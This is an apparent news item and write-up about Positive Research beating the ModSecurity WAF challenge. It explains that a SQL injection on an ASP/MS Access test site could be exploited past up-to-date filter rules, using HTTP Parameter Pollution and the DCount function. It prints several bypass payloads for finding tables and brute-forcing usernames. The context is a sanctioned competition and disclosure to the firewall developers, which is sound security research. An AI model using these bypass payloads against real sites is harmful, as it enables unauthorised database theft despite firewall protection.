Positive Research, the innovative department of Positive Technologies, deserves thanks from Trustwave, WAF ModSecurity developers for Web Application Firewall research.
The testing consisted of two stages. At the first stage, competitors should exploit SQL Injection to get data from database of test sites. The second task was more complicated: the task was the same but competitors should bypass ModSecurity filter rules and do not generate firewall events.
The experts are usually interested in protection means. Thus, Dmitry Evteev, Positive Research expert, suggested a universal technique how to bypass ModSecurity filtering (http://ptresearch.blogspot.com/2009/11/another-fine-method-to-exploit-sql.html) in 2009. New ModSecurity version design uses the ideas.
Positive Research experts successfully managed all tasks and bypassed WAF ModSecurity restrictions with the up-to-date filter rules. The developers are going to use the results to improve firewall efficiency.
Alexander Anisimov, Positive Research team leader remarks: «Web Application Firewall protects the most part of web applications from mass attacks. But our penetration testing clearly shows that Web Application Firewall version «form the box» is unable to protect systems from a great number of targeted attacks. So we believe the best way is to use WAF to eliminate detected vulnerabilities. The possible solution is to integrate compliance and vulnerability management system MaxPatrol and Web Application Firewall ModSecurity».
More details about the competition are available here: http://www.modsecurity.org/demo/challenge.html.
The participants should provide organizers the above-listed data and details how to get them to complete the level 1. And only then you got access to ModSecurity. This is Speed Hack itself. So, by the evening 24th of June there were no chance to have any uncompleted stages on the level 1. But, surprisingly, the participants completed level 1 only for web sites that were not hacked by the evening 24th of June. PT Research Team members easily exploit the detected SQL Injections that use MSAccess. Not long after, organizers confirmed us as level 1 winners, then level 1 was closed as everything was hacked. According to organizers, they processed about 500 solutions, but no one was able to exploit SQL Injection vulnerability in MS Access database. We think the reason is its unpopularity =)
Then we try to solve problem 2: exploit SQL Injection to bypass up-to-date WAF ModSecurity rules. We decide to use the method from the first stage – exploit vulnerability on the IBM test site (IIS + ASP + MsAccess).
To bypass WAF we use MS Access operators and the features of IIS and ASP association that allows us to conduct HTTP Parameter Pollution attack.
We exploit SQL Injection vulnerability in test site script transaction.asp. User input is insufficiently controlled in the server script that allows attackers to conduct SQL Injection.
Below you can find requests that are not detected by ModSecurity and allow you to get all necessary data to connect to web site database.
A crafted SQL request that addresses evidently defined database, is enough to get database name. Error-based method with bruteforce technique was used to find existed databases via requests with not existed database name. Web application responses with MS Access error which indicates that the database does not exist.
Here is an example:
__VIEWSTATE=[skipped]&after=1 and (select 1&after=1 from a.c)&before=2—1
Here is an example:
__VIEWSTATE=[skipped]&after=1 and (select 1&after=1 from users1)&before=2—1
Here is an example:
__VIEWSTATE=[skipped]&after=&before=1231 group by 1&before=transid having 1
First of all, we create a special statement that allows us to detect data in database. Here is the request:
__VIEWSTATE=[skipped]&after=1 AND (select username from users where username=\'admin\')&before=d
__VIEWSTATE=[skipped]&after=1 AND (select mid(last(username)&after=1&after=1) from users where username=\'admin\') &before=d
It works but WAF filters it: exactly “mid(“ and similar character sets. We found DCount function in MSAccess manual that together with WAF allows us to exploit the vulnerability and bypass WAF. Here is an example:
__VIEWSTATE=[skipped]&after=1 AND (select DCount(last(username)&after=1&after=1) from users where username=\'ad1min\')&before=d
You can get database data via bruteforce.